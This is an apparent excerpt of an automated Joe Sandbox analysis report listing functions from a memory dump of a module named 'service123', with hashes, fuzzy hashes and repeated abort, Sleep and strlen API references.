Instruction ID: 0a057fabd3daec8ad446cd75c8c3a2382bbe471d64498698adf90753e355c51f
Opcode Fuzzy Hash: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction Fuzzy Hash: 3BD0173058970E8FC304FF48D1948A9F7F5AB4E305B419D69C808A7F21D631D458CE05

Function 6C2EBDC7 Relevance: 37.5, APIs: 25, Instructions: 44COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction ID: 7d5fd6e29eee273e185b91001a421ea3e77d8d62198f3599ee5420e12eec9a0e
Opcode Fuzzy Hash: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction Fuzzy Hash: BCC012219D931D4BC1103E98105076AF2A49B1B304F522C1C8C5533E018B71EC558D49

Function 6C2EBE98 Relevance: 37.5, APIs: 25, Instructions: 43COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction ID: e4e9cb9524734feca9991ea07de33ccc3de23426ac32f138006495e8cddebeff
Opcode Fuzzy Hash: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction Fuzzy Hash: EEC01235A9931E8BC200BE8490508A9F374AB5F304F412C58CC1173F018770E859CD45

Function 6C2EBDE8 Relevance: 37.5, APIs: 25, Instructions: 42COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction ID: 4b8c071c75b7879e7c8f405a9f267eb8f6f2538846ccc13e84abf226b28b3139
Opcode Fuzzy Hash: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction Fuzzy Hash: B9C08C309DC31E4780003E4810A0878F3A4070B324B862D28CC0033F01CA22D8A98C48

Function 6C2EC150 Relevance: 36.3, APIs: 24, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfaf95d87cc5e052a219066e4122d93f5d46f54eb8c1ee07941fbf666d7ecff3
Instruction ID: 535f5eb4d602232b3f47680dae3ed5062986859da9a5f023ce5db4a9d108547d
Opcode Fuzzy Hash: bfaf95d87cc5e052a219066e4122d93f5d46f54eb8c1ee07941fbf666d7ecff3
Instruction Fuzzy Hash: 51B1C27160834A8FD710DF98C48075ABBF1BF9A308F44496DED94ABB02C375E944CB92

Function 6C2EC470 Relevance: 33.2, APIs: 22, Instructions: 152COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ba1ecc352e45c976c6699f2bf1b294d7236f35a16359cee28709a58dff129a32
Instruction ID: 0f66168eab87c953371d1350faffa0211703744e108777b9ce95ac62a3921561
Opcode Fuzzy Hash: ba1ecc352e45c976c6699f2bf1b294d7236f35a16359cee28709a58dff129a32
Instruction Fuzzy Hash: AC419DB1A112198BCB00DFA8C4917A9BFF5BB49354F58846AEC55FF782D3359441CF50

Function 6C2ED370 Relevance: 31.6, APIs: 21, Instructions: 130sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2ECD00: strlen.MSVCRT ref: 6C2ECD7D

Sleep.KERNEL32 ref: 6C2ED4D7
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort$Sleepstrlen
String ID:
API String ID: 68130653-0
Opcode ID: 5812cb7a8e9d64cafe1b49cf6660fbb5876fe3e4e1af5fafb61bb63ce60fa533
Instruction ID: daf585e6431db2ad9ce37b4c59479105a6e1392d5cd56765dff257757687f445
Opcode Fuzzy Hash: 5812cb7a8e9d64cafe1b49cf6660fbb5876fe3e4e1af5fafb61bb63ce60fa533
Instruction Fuzzy Hash: D551E9A038C3C5CAEB11EB3982457457FB467A7308F08465CDB885B683D3BA5449CB6B

Function 6C2ED570 Relevance: 28.6, APIs: 19, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: b5dacc7c83acef74916b35b9355254f2f0f3ffbf4c21e0e286ac1803e43428a2
Instruction ID: 654e4588c2b2f42f4738f2d1574f7550279e01b3cd3b7949eff002b7bc226370
Opcode Fuzzy Hash: b5dacc7c83acef74916b35b9355254f2f0f3ffbf4c21e0e286ac1803e43428a2
Instruction Fuzzy Hash: 2F31B57064930A8FE310DF69E48076AB7E4EBC9319F94892DE998A7B01D335D454CF81

Function 6C2ED67C Relevance: 28.5, APIs: 19, Instructions: 32COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction ID: e770d6391b8e50ed68a0600ad7305901123a63a2649d97f5b2d374c659c2ad68
Opcode Fuzzy Hash: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction Fuzzy Hash: D3B01210CD922CC390043FA444400B9F3385B073487007C044D2733D030B30F4F68C54

Function 6C2ED6C0 Relevance: 27.1, APIs: 18, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: a215272db6202d4dbf703fd5d6f629524415a06a555c730aab3cc5db4b95b0c5
Instruction ID: 85572124ac106abf27dcf56b89843bb57fad9e2c1d5c0a2c140283e0917dc899
Opcode Fuzzy Hash: a215272db6202d4dbf703fd5d6f629524415a06a555c730aab3cc5db4b95b0c5
Instruction Fuzzy Hash: 44413870A0930A8FE310DF1AC58075ABBE1EBCD708F50892EE998E7B51D375D8448F92

Function 6C2ED855 Relevance: 25.5, APIs: 17, Instructions: 45COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2EC5DB), ref: 6C3B6D44
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D51
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D56
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
